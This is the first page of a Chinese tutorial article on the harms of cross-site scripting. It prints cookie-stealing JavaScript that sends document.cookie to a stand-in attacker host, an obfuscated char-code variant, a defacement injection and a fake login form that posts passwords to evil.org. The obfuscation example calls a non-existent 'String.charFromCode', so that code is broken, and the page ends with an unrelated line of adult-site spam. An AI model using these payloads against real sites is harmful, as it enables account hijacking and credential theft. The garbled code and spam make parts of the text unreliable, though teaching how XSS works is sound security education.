當前位置 : 首頁>軟件學院>網(wǎng)絡(luò)技術(shù)>黑客攻防>正文

跨站腳本攻擊的危害及cookie盜竊

http://m.yibo1263.com　2009-7-3 8:23:17 　來源:東北IT網(wǎng) 　編輯:葉子

跨站腳本的名稱源自于這樣一個事實，即一個Web 站點(或者人)可以把他們的選擇的代碼越過安全邊界線注射到另一個不同的、有漏洞的Web 站點中。當這些注入的代碼作為目標站點的代碼在受害者的瀏覽器中執(zhí)行時，攻擊者就能竊取相應(yīng)的敏感數(shù)據(jù)，并強迫用戶做一些用戶非本意的事情。

在本文的上篇中，我們詳細介紹了跨站腳本漏洞利用的過程，并對HTML注入進行深入分析；而本文將詳細介紹跨站腳本的危害，以及攻擊者是如何誘騙受害者的；最后介紹針對跨站腳本攻擊的防御措施。

一、跨站腳本的危害

XSS是一種對Web應(yīng)用程序的用戶發(fā)動的攻擊，利用它攻擊者能裝扮成被攻擊的用戶來完全控制Web應(yīng)用程序，即便Web應(yīng)用程序位于一個防火墻之后并且攻擊者無法直接接觸該Web應(yīng)用程序也是如此。XSS一般不會對用戶的機器造成損害，也不會對Web應(yīng)用程序服務(wù)器直接造成破壞。如果成功，攻擊者可以做三種事情：

竊取Cookie

在受害用戶面前假冒成Web應(yīng)用程序

在Web應(yīng)用程序面前假冒成受害用戶

二、竊取Cookie

Cookie一般控制著對Web應(yīng)用程序的訪問，如果攻擊者偷竊了受害用戶的Cookie，那么攻擊者就可以使用受害者的Cookie來完全控制受害者的帳戶。對于Cookie來說，其最佳實踐就是讓它在一段時間后過期，這樣的話攻擊者就只能在有限的時間內(nèi)訪問受害者的帳戶�？梢岳孟旅娴拇a來竊取Cookie：

var x=new Image();x.src='http://attackerssite.com/eatMoreCookies?c='

+document.cookie;

或者像下面這樣：

document.write("〈 img src='http://attackerssite.com/eatMoreCookies"+

"?c="+document.cookie+"'〉");

如果某些字符是禁止的，則將其轉(zhuǎn)換為ASCII的十進制數(shù)，然后使用JavaScript的String.charFromCode()函數(shù)即可。下列JavaScript等價于前面的JavaScript：

eval(String.charFromCode(118,97,114,32,120,61,110,101,119,32,73,109,

97,103,101,40,41,59,120,46,115,114,99,61,39,104,116,116,112,58,47,47,

97,116,116,97,99,107,101,114,115,115,105,116,101,46,99,111,109,47,

101,97,116,77,111,114,101,67,111,111,107,105,101,115,63,99,61,39,43,

100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59));

三、釣魚攻擊

通過假冒Web應(yīng)用程序，攻擊者可以將XSS用于社會工程。XSS攻擊得手后，攻擊者能夠完全控制Web應(yīng)用程序的外觀。這可用于丑化web，例如攻擊者在頁面上放置一個無聊的圖片。適于打印的常見圖像之一是Stall0wn3d，即你被黑了。

下面是用于這種攻擊的HTML注入字符串：

〈script〉document.body.innerHTML="〈img

src=http://evil.org/stallown3d.jpg〉";〈/script〉.

然而，控制Web應(yīng)用程序呈現(xiàn)在受害用戶面前的外觀比簡單顯示一些火辣熱圖更為有利，攻擊者可以以此發(fā)動釣魚攻擊：強制用戶向攻擊者提供機密信息。利用document.body.innerHTML，可以提供一個跟有弱點的Web應(yīng)用程序的登錄頁面外觀完全一樣的登錄頁面，并且該登錄頁面來自那個被注入HTML的域，但是提交表單時，數(shù)據(jù)卻發(fā)往攻擊者選擇的站點。

因此，當受害用戶輸入他的或者她的用戶名和口令時，這些信息就會落入攻擊者手中。代碼如下所示：

document.body.innerHTML="〈 h1 〉Company Login〈 / h1〉〈form

action=http://evil.org/grabPasswords method=get〉

〈p〉User name:〈input type=text name=u〉〈p〉Password〈input type=password

name=p〉〈input type=submit name=login〉〈/form〉";

使用這段代碼的一個小技巧是通過一個GET請求發(fā)送表單。這樣，攻擊者甚至不必編寫grabPasswords頁面，因為該請求將寫到Web服務(wù)器的錯誤信息日志里，這里的信息可以輕松讀取。

四、冒充受害者胡作非為

XSS對Web應(yīng)用程序最大的影響在于，黑客能夠通過它假冒成Web應(yīng)用程序的合法用戶。下面是一些攻擊者能夠?qū)eb應(yīng)用程序做的一些事情：
在一個webmail應(yīng)用程序中，攻擊者可以：

以用戶的名義發(fā)送電子郵件

獲取用戶的聯(lián)系人名單

更改自動BCC屬性

更改隱私/日志記錄設(shè)置

在基于 Web 的即時通訊或聊天軟件中，攻擊者可以：

獲取聯(lián)系人名單

本新聞共4頁,當前在第1頁 1 2 3 4

【收藏】【打印】【進入論壇】

相關(guān)文章：

·杜絕Cookie傳送提高網(wǎng)站訪問速度

·三種禁用Cookie的方法讓上網(wǎng)更安全

亚洲AV无码乱码在线观看不卡|最新大伊香蕉精品视频在线|亚洲不卡av一区二区|国产美女无遮挡免费